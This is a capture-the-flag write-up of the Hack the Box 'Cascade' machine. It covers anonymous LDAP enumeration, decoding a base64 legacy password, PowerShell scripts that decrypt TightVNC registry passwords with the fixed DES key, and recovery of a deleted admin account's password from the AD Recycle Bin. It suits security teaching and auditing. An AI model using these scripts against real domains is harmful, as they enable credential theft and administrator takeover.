Hack the Box: Cascade

Recon

Nmap reveals a domain controller: DNS, Kerberos, LDAP and the global catalog (3268/3269) are all exposed, and the DNS banner dates the host to Windows Server 2008 R2:

# nmap cascade.htb -sS -sV
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-16 18:58:31Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
The DC accepts anonymous LDAP binds (ldapsearch -x with no bind DN), so the whole directory can be dumped without credentials. Ryan Thompson's object carries a non-standard attribute, cascadeLegacyPwd, whose value looks like base64:

# ldapsearch -x -o ldif-wrap=no -h cascade -b "DC=cascade,DC=local"
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
-- snip --
cascadeLegacyPwd: clk0bjVldmE=
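Custom schema attributes like this are easy to miss in a long LDIF dump. The following added example (not part of the original writeup) generalises the find: it binds anonymously, as ldapsearch did, pulls every attribute of every user object and flags attribute names that look password-related, attempting a base64 decode of each value. The server name, base DN and the name pattern are assumptions; the standard pwd* attributes are excluded because they hold timestamps and counters, not secrets.

```powershell
# Added example, not from the original writeup. Assumes a Windows host that can
# reach the DC and that anonymous LDAP reads are permitted (as ldapsearch showed).
function Find-PasswordLikeAttributes {
    param(
        [string]$Server      = 'cascade.local',             # assumed
        [string]$BaseDn      = 'DC=cascade,DC=local',
        [string]$NamePattern = 'pwd|pass',                  # attribute names to flag
        # Standard attributes that match the pattern but hold no secret.
        [string]$Exclude     = '^(pwdlastset|badpwdcount|badpasswordtime)$'
    )
    # Explicit anonymous bind: no username, no password.
    $root = [System.DirectoryServices.DirectoryEntry]::new(
        "LDAP://$Server/$BaseDn", $null, $null,
        [System.DirectoryServices.AuthenticationTypes]::Anonymous)
    $searcher = [System.DirectoryServices.DirectorySearcher]::new($root)
    $searcher.Filter   = '(objectClass=user)'
    $searcher.PageSize = 500      # paged results: get past the 1000-entry server cap
    # An empty PropertiesToLoad returns every attribute, schema extensions included.

    foreach ($r in $searcher.FindAll()) {
        foreach ($name in $r.Properties.PropertyNames) {
            if ($name -notmatch $NamePattern -or $name -match $Exclude) { continue }
            foreach ($v in $r.Properties[$name]) {
                $decoded = $null
                if ($v -is [string]) {
                    # Many "legacy" attributes are just base64 of the plaintext;
                    # a FormatException means the value was not base64 at all.
                    try {
                        $decoded = [Text.Encoding]::UTF8.GetString(
                            [Convert]::FromBase64String($v))
                    } catch [FormatException] { }
                }
                [pscustomobject]@{
                    DN            = $r.Path
                    Attribute     = $name
                    Raw           = $v
                    Base64Decoded = $decoded
                }
            }
        }
    }
}

Find-PasswordLikeAttributes | Format-List
```

Run this from any domain-joined or standalone Windows box; against this DC it reports the cascadeLegacyPwd value on Ryan Thompson's object together with its decoded form. The same loop is a useful defensive audit: any hit outside the excluded list is a schema extension somebody added to store a credential.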

User access

With those credentials (Ryan Thompson's account and the decoded legacy password) it is possible to read a couple of SMB shares. One of them holds an exported TightVNC configuration in s.smith's folder:

# cat IT/Temp/s.smith/VNC\ Install.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
-- snip --
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
-- snip --
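That Password value is not a hash. VNC servers (TightVNC included) store the server password as DES-ECB ciphertext under a fixed key that has been public for decades, so anyone who can read the .reg file can recover the plaintext. The following added example (not from the original writeup) parses the REG_BINARY line and decrypts it with .NET's DES. The only assumption is the fixed VNC key, 17 52 6b 06 23 4e 58 07; because VNC's DES feeds key bits in reversed order, a standard DES implementation needs the bit-reversed form e8 4a d6 60 c4 72 1a e0, which is what the code uses.

```powershell
# Added example, not part of the original writeup.
# TightVNC stores the server password as 8 bytes of DES-ECB ciphertext under a
# fixed key (17 52 6b 06 23 4e 58 07). The VNC DES code consumes key bits
# LSB-first, so for a normal DES implementation the equivalent key is the
# bit-reversed form below.
$VncFixedKey = [byte[]](0xe8, 0x4a, 0xd6, 0x60, 0xc4, 0x72, 0x1a, 0xe0)

function ConvertFrom-RegHexValue {
    # Parses a .reg REG_BINARY line such as   "Password"=hex:6b,cf,2a,...
    # Long values in .reg files wrap with a trailing backslash; join the
    # continuation lines into one string before calling this.
    param([Parameter(Mandatory)][string]$Line)
    $hex = ($Line -replace '^\s*"[^"]*"\s*=\s*hex:', '') -replace '[\\\s]', ''
    [byte[]]($hex -split ',' |
        Where-Object { $_ } |
        ForEach-Object { [Convert]::ToByte($_, 16) })
}

function Unprotect-VncPassword {
    param([Parameter(Mandatory)][byte[]]$Cipher)
    if ($Cipher.Length % 8 -ne 0) {
        throw "VNC password blob must be a multiple of 8 bytes, got $($Cipher.Length)"
    }
    $des = [System.Security.Cryptography.DES]::Create()
    $des.Key     = $VncFixedKey
    $des.Mode    = [System.Security.Cryptography.CipherMode]::ECB
    $des.Padding = [System.Security.Cryptography.PaddingMode]::None   # raw 8-byte block
    $plain = $des.CreateDecryptor().TransformFinalBlock($Cipher, 0, $Cipher.Length)
    # VNC passwords are at most 8 characters; shorter ones are NUL padded.
    [Text.Encoding]::ASCII.GetString($plain).TrimEnd([char]0)
}

# Value copied from the VNC Install.reg above.
$bytes = ConvertFrom-RegHexValue '"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f'
Unprotect-VncPassword $bytes
```

The file sits in s.smith's own folder and the writeup's next step acts as s.smith, so the recovered VNC password is the credential to try against that domain account. Password reuse between a VNC service and a domain login is the actual weakness here; the fixed-key "encryption" only makes the reuse discoverable.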

Root

S.Smith can also read an SMB share that was not accessible before, Audit$.

Reversing

The password stored there is encrypted rather than hashed. Reversing CascAudit.exe, the program that consumes it, reveals the algorithm and the key it uses, which is enough to decrypt the value.

Administrator account

The ArkSvc user is a member of the AD Recycle Bin group, which lets it read deleted directory objects.

For reference, the cascadeLegacyPwd value found on Ryan Thompson's LDAP object earlier is plain base64:

# echo "clk0bjVldmE=" | base64 --decode
rY4n5eva

A note found while enumerating the box explains why a deleted object is worth looking for:

We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).

TempAdmin has since been deleted, but with the Recycle Bin enabled a deleted object keeps its attributes until the deleted-object lifetime expires, so ArkSvc can still read it, and the note says its password is the administrator's.
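Deleted objects are hidden from ordinary LDAP queries; Get-ADObject only returns them with -IncludeDeletedObjects, and they are renamed to "<cn>\0ADEL:<guid>" on deletion, so the search has to use a wildcard on the name. The following added example (not from the original writeup) runs as ArkSvc, finds the tombstoned TempAdmin object and decodes its legacy password attribute. It assumes the ActiveDirectory RSAT module is available and that the deleted object still carries the same custom cascadeLegacyPwd attribute seen on live users; both are assumptions, the attribute name and the base64 encoding being taken from Ryan Thompson's object above.

```powershell
# Added example, not from the original writeup. Assumes a session running as
# ArkSvc (member of AD Recycle Bin) with the ActiveDirectory module installed,
# and that the deleted object retains the custom cascadeLegacyPwd attribute.
Import-Module ActiveDirectory

function Get-DeletedLegacyPassword {
    param(
        [string]$NamePrefix = 'TempAdmin',
        [string]$Attribute  = 'cascadeLegacyPwd'   # assumed to survive deletion
    )
    # isDeleted=TRUE limits the search to Recycle Bin objects; the cn wildcard
    # matches the "TempAdmin\0ADEL:<guid>" name a deleted object is given.
    $objs = Get-ADObject -LDAPFilter "(&(isDeleted=TRUE)(cn=$NamePrefix*))" `
                         -IncludeDeletedObjects `
                         -Properties @($Attribute, 'whenChanged', 'lastKnownParent')

    foreach ($o in $objs) {
        $raw = $o.$Attribute
        if (-not $raw) { continue }          # object exists but attribute was stripped
        # Same encoding as the live users' attribute: base64 of the plaintext.
        $plain = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($raw))
        [pscustomobject]@{
            DistinguishedName = $o.DistinguishedName
            LastKnownParent   = $o.lastKnownParent
            Deleted           = $o.whenChanged
            Password          = $plain
        }
    }
}

Get-DeletedLegacyPassword
```

Per the migration note, the recovered value is also the normal admin account's password. Defensively, the lesson is that deleting an account does not delete what was written to it: credential-bearing attributes live on in the Recycle Bin for the whole deleted-object lifetime, and membership in the AD Recycle Bin group is therefore as sensitive as the secrets stored on any object that was ever deleted.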
